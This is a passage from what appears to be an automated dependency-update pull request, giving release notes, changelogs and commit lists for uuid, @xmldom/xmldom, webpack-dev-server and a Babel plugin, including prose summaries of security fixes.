href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `uuid` from 13.0.0 to 14.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/uuidjs/uuid/releases\"\u003euuid's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev14.0.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2026-04-19)\u003c/h2\u003e\n\u003ch3\u003e⚠ BREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eexpect \u003ccode\u003ecrypto\u003c/code\u003e to be global everywhere (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edrop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edrop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/dc4ddb87272ed2843faccd130bcc41d492688bd3\"\u003edc4ddb8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eexpect \u003ccode\u003ecrypto\u003c/code\u003e to be global everywhere (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/f2c235f93059325fa43e1106e624b5291bb523c4\"\u003ef2c235f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUse GITHUB_TOKEN for release-please and enable npm provenance (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/925\"\u003e#925\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/ffa31383e8e4e1f0b4e22e504561272041b8738c\"\u003effa3138\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.1...v13.0.2\"\u003e13.0.2\u003c/a\u003e (2026-05-04)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ererelease to fix provenance. (\u003ca href=\"https://github.com/uuidjs/uuid/commit/49ccb35f78c0c4ce1409dd2f1d89f83caadba10b\"\u003e49ccb35\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v13.0.1\"\u003e13.0.1\u003c/a\u003e (2026-04-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ebackport fix for GHSA-w5hq-g745-h8pq (\u003ca href=\"https://github.com/uuidjs/uuid/commit/9d27ddf7046ce496ef39569ff84d948eeff9cb2a\"\u003e9d27ddf\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/uuidjs/uuid/blob/main/CHANGELOG.md\"\u003euuid's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2026-04-19)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq\"\u003eGHSA-w5hq-g745-h8pq\u003c/a\u003e: \u003ccode\u003ev3()\u003c/code\u003e, \u003ccode\u003ev5()\u003c/code\u003e, and \u003ccode\u003ev6()\u003c/code\u003e did not validate that writes would remain within the bounds of a caller-supplied buffer, allowing out-of-bounds writes when an invalid \u003ccode\u003eoffset\u003c/code\u003e was provided. A \u003ccode\u003eRangeError\u003c/code\u003e is now thrown if \u003ccode\u003eoffset \u0026lt; 0\u003c/code\u003e or \u003ccode\u003eoffset + 16 \u0026gt; buf.length\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e⚠ BREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ecrypto\u003c/code\u003e is now expected to be globally defined (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edrop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade minimum supported TypeScript version to 5.4.3, in keeping with the project's policy of supporting TypeScript versions released within the last two years\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/7c1ea087a8149b57380fc8bb7f68c3a215cb6e4b\"\u003e\u003ccode\u003e7c1ea08\u003c/code\u003e\u003c/a\u003e chore(main): release 14.0.0 (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/926\"\u003e#926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34\"\u003e\u003ccode\u003e3d2c5b0\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/f2c235f93059325fa43e1106e624b5291bb523c4\"\u003e\u003ccode\u003ef2c235f\u003c/code\u003e\u003c/a\u003e fix!: expect \u003ccode\u003ecrypto\u003c/code\u003e to be global everywhere (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/529ef0899f5dd503d2ee90d690585d63d78bc212\"\u003e\u003ccode\u003e529ef08\u003c/code\u003e\u003c/a\u003e chore: upgrade TypeScript and fixup types (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/927\"\u003e#927\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/086fd7976f11433edf9ac80be876b3ad243fe087\"\u003e\u003ccode\u003e086fd79\u003c/code\u003e\u003c/a\u003e chore: update dependencies (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/933\"\u003e#933\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/dc4ddb87272ed2843faccd130bcc41d492688bd3\"\u003e\u003ccode\u003edc4ddb8\u003c/code\u003e\u003c/a\u003e feat!: drop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/0f1f9c9c9cedbae5a1d363d5406c5dfbabe81404\"\u003e\u003ccode\u003e0f1f9c9\u003c/code\u003e\u003c/a\u003e chore: switch to Biome for parsing and linting (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/932\"\u003e#932\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/e2879e64bf125add903c1eff6e0860542c605013\"\u003e\u003ccode\u003ee2879e6\u003c/code\u003e\u003c/a\u003e chore: use maintained version of npm-run-all (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/930\"\u003e#930\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/ffa31383e8e4e1f0b4e22e504561272041b8738c\"\u003e\u003ccode\u003effa3138\u003c/code\u003e\u003c/a\u003e fix: Use GITHUB_TOKEN for release-please and enable npm provenance (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/925\"\u003e#925\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/0423d49df2dc8efc300c804731d25f4d7e0fccc4\"\u003e\u003ccode\u003e0423d49\u003c/code\u003e\u003c/a\u003e docs: remove obsolete v1 option notes (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/915\"\u003e#915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for uuid since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@xmldom/xmldom` from 0.8.12 to 0.8.13\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/xmldom/xmldom/releases\"\u003e@​xmldom/xmldom's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.8.13\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.12...0.8.13\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer.serializeToString()\u003c/code\u003e (and \u003ccode\u003eNode.toString()\u003c/code\u003e, \u003ccode\u003eNodeList.toString()\u003c/code\u003e) now accept a \u003ccode\u003erequireWellFormed\u003c/code\u003e option (fourth argument, after \u003ccode\u003eisHtml\u003c/code\u003e and \u003ccode\u003enodeFilter\u003c/code\u003e). When \u003ccode\u003e{ requireWellFormed: true }\u003c/code\u003e is passed, the serializer throws \u003ccode\u003eInvalidStateError\u003c/code\u003e for injection-prone node content, preventing XML injection via attacker-controlled node data. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-j759-j44w-7fr8\"\u003e\u003ccode\u003eGHSA-j759-j44w-7fr8\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-x6wf-f3px-wcqx\"\u003e\u003ccode\u003eGHSA-x6wf-f3px-wcqx\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-f6ww-3ggp-fr8h\"\u003e\u003ccode\u003eGHSA-f6ww-3ggp-fr8h\u003c/code\u003e\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eComment: throws when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e--\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eProcessingInstruction: throws when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e?\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDocumentType: throws when \u003ccode\u003epublicId\u003c/code\u003e fails \u003ccode\u003ePubidLiteral\u003c/code\u003e, \u003ccode\u003esystemId\u003c/code\u003e fails \u003ccode\u003eSystemLiteral\u003c/code\u003e, or \u003ccode\u003einternalSubset\u003c/code\u003e contains \u003ccode\u003e]\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eSecurity: DOM traversal operations (\u003ccode\u003eXMLSerializer.serializeToString()\u003c/code\u003e, \u003ccode\u003eNode.prototype.normalize()\u003c/code\u003e, \u003ccode\u003eNode.prototype.cloneNode(true)\u003c/code\u003e, \u003ccode\u003eDocument.prototype.importNode(node, true)\u003c/code\u003e, \u003ccode\u003enode.textContent\u003c/code\u003e getter, \u003ccode\u003egetElementsByTagName()\u003c/code\u003e / \u003ccode\u003egetElementsByTagNameNS()\u003c/code\u003e / \u003ccode\u003egetElementsByClassName()\u003c/code\u003e / \u003ccode\u003egetElementById()\u003c/code\u003e) are now iterative. Previously, deeply nested DOM trees would exhaust the JavaScript call stack and throw an unrecoverable \u003ccode\u003eRangeError\u003c/code\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-2v35-w6hq-6mfw\"\u003e\u003ccode\u003eGHSA-2v35-w6hq-6mfw\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/Jvr2022\"\u003e\u003ccode\u003e@​Jvr2022\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/praveen-kv\"\u003e\u003ccode\u003e@​praveen-kv\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/decsecre583\"\u003e\u003ccode\u003e@​decsecre583\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/tlsbollei\"\u003e\u003ccode\u003e@​tlsbollei\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/KarimTantawey\"\u003e\u003ccode\u003e@​KarimTantawey\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/xmldom/xmldom/blob/master/CHANGELOG.md\"\u003e@​xmldom/xmldom's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.12...0.8.13\"\u003e0.8.13\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer.serializeToString()\u003c/code\u003e (and \u003ccode\u003eNode.toString()\u003c/code\u003e, \u003ccode\u003eNodeList.toString()\u003c/code\u003e) now accept a \u003ccode\u003erequireWellFormed\u003c/code\u003e option (fourth argument, after \u003ccode\u003eisHtml\u003c/code\u003e and \u003ccode\u003enodeFilter\u003c/code\u003e). When \u003ccode\u003e{ requireWellFormed: true }\u003c/code\u003e is passed, the serializer throws \u003ccode\u003eInvalidStateError\u003c/code\u003e for injection-prone node content, preventing XML injection via attacker-controlled node data. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-j759-j44w-7fr8\"\u003e\u003ccode\u003eGHSA-j759-j44w-7fr8\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-x6wf-f3px-wcqx\"\u003e\u003ccode\u003eGHSA-x6wf-f3px-wcqx\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-f6ww-3ggp-fr8h\"\u003e\u003ccode\u003eGHSA-f6ww-3ggp-fr8h\u003c/code\u003e\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eComment: throws when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e--\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eProcessingInstruction: throws when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e?\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDocumentType: throws when \u003ccode\u003epublicId\u003c/code\u003e fails \u003ccode\u003ePubidLiteral\u003c/code\u003e, \u003ccode\u003esystemId\u003c/code\u003e fails \u003ccode\u003eSystemLiteral\u003c/code\u003e, or \u003ccode\u003einternalSubset\u003c/code\u003e contains \u003ccode\u003e]\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eSecurity: DOM traversal operations (\u003ccode\u003eXMLSerializer.serializeToString()\u003c/code\u003e, \u003ccode\u003eNode.prototype.normalize()\u003c/code\u003e, \u003ccode\u003eNode.prototype.cloneNode(true)\u003c/code\u003e, \u003ccode\u003eDocument.prototype.importNode(node, true)\u003c/code\u003e, \u003ccode\u003enode.textContent\u003c/code\u003e getter, \u003ccode\u003egetElementsByTagName()\u003c/code\u003e / \u003ccode\u003egetElementsByTagNameNS()\u003c/code\u003e / \u003ccode\u003egetElementsByClassName()\u003c/code\u003e / \u003ccode\u003egetElementById()\u003c/code\u003e) are now iterative. Previously, deeply nested DOM trees would exhaust the JavaScript call stack and throw an unrecoverable \u003ccode\u003eRangeError\u003c/code\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-2v35-w6hq-6mfw\"\u003e\u003ccode\u003eGHSA-2v35-w6hq-6mfw\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/Jvr2022\"\u003e\u003ccode\u003e@​Jvr2022\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/praveen-kv\"\u003e\u003ccode\u003e@​praveen-kv\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/decsecre583\"\u003e\u003ccode\u003e@​decsecre583\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/tlsbollei\"\u003e\u003ccode\u003e@​tlsbollei\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/KarimTantawey\"\u003e\u003ccode\u003e@​KarimTantawey\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.9.8...0.9.9\"\u003e0.9.9\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eimplement \u003ccode\u003eParentNode.children\u003c/code\u003e getter \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/960\"\u003e\u003ccode\u003e[#960](https://github.com/xmldom/xmldom/issues/960)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/410\"\u003e\u003ccode\u003e[#410](https://github.com/xmldom/xmldom/issues/410)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity: \u003ccode\u003ecreateCDATASection\u003c/code\u003e now throws \u003ccode\u003eInvalidCharacterError\u003c/code\u003e when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e, as required by the \u003ca href=\"https://dom.spec.whatwg.org/#dom-document-createcdatasection\"\u003eWHATWG DOM spec\u003c/a\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer\u003c/code\u003e now splits CDATASection nodes whose data contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e into adjacent CDATA sections at serialization time, preventing XML injection via mutation methods (\u003ccode\u003eappendData\u003c/code\u003e, \u003ccode\u003ereplaceData\u003c/code\u003e, \u003ccode\u003e.data =\u003c/code\u003e, \u003ccode\u003e.textContent =\u003c/code\u003e). \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ecorrectly traverse ancestor chain in \u003ccode\u003eNode.contains\u003c/code\u003e \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/931\"\u003e\u003ccode\u003e[#931](https://github.com/xmldom/xmldom/issues/931)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eCode that passes a string containing \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e to \u003ccode\u003ecreateCDATASection\u003c/code\u003e and relied on the previously unsafe behavior will now receive \u003ccode\u003eInvalidCharacterError\u003c/code\u003e. Use a mutation method such as \u003ccode\u003eappendData\u003c/code\u003e if you intentionally need \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e in a CDATASection node's data.\u003c/p\u003e\n\u003ch3\u003eChore\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdated dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/stevenobiajulu\"\u003e\u003ccode\u003e@​stevenobiajulu\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/yoshi389111\"\u003e\u003ccode\u003e@​yoshi389111\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/e5c14802592685bb872c042c54c3f73758875c85\"\u003e\u003ccode\u003ee5c1480\u003c/code\u003e\u003c/a\u003e 0.8.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/9611e20d75f059dc377f806a8f7ee7d1eaeaeb7c\"\u003e\u003ccode\u003e9611e20\u003c/code\u003e\u003c/a\u003e style: drop unused import in test file\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/dc4dff3d1d0b5a6b97c52fcc1823a735b8821e62\"\u003e\u003ccode\u003edc4dff3\u003c/code\u003e\u003c/a\u003e docs: add 0.8.13 changelog entry\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/842fa38deedd2d9a9c90d0ad54aa1be75d2a41bc\"\u003e\u003ccode\u003e842fa38\u003c/code\u003e\u003c/a\u003e fix: prevent stack overflow in normalize (GHSA-2v35-w6hq-6mfw)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/aeff69f5a32e8c1bd540683da9e10718f84f595c\"\u003e\u003ccode\u003eaeff69f\u003c/code\u003e\u003c/a\u003e test: add normalize behavioral coverage to node.test.js\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/cbdb0d7db8ae70760bd4cc181cb8f30bb0cd9d88\"\u003e\u003ccode\u003ecbdb0d7\u003c/code\u003e\u003c/a\u003e fix: make walkDOM iterative to prevent stack overflow (GHSA-2v35-w6hq-6mfw)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/0b543d31794dc198c86a0358574cb5dec29674c5\"\u003e\u003ccode\u003e0b543d3\u003c/code\u003e\u003c/a\u003e test: assert namespace declarations are isolated between siblings in serializ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/c007c51909587990c962cf3d5c2acadf4c897b87\"\u003e\u003ccode\u003ec007c51\u003c/code\u003e\u003c/a\u003e refactor: migrate serializeToString to walkDOM\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/2bb3899074820089d9e76ce28a5edfdacf425025\"\u003e\u003ccode\u003e2bb3899\u003c/code\u003e\u003c/a\u003e test: add serializeToString coverage for uncovered branches\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/e69f38d0a58731152d300e8c8eb29506f5f488fe\"\u003e\u003ccode\u003ee69f38d\u003c/code\u003e\u003c/a\u003e refactor: migrate importNode to walkDOM\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.12...0.8.13\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~karfau\"\u003ekarfau\u003c/a\u003e, a new releaser for \u003ccode\u003e@​xmldom/xmldom\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/plugin-transform-modules-systemjs` from 7.23.3 to 7.29.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/plugin-transform-modules-systemjs's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.7 (2026-05-25)\u003c/h2\u003e\n\u003cp\u003eRe-release all packages with npm provenance attestations\u003c/p\u003e\n\u003ch2\u003ev7.29.6 (2026-05-25)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18014\"\u003e#18014\u003c/a\u003e Catchup source map position in preserveFormat (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18001\"\u003e#18001\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17998\"\u003e#17998\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMateusz Burzyński (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca 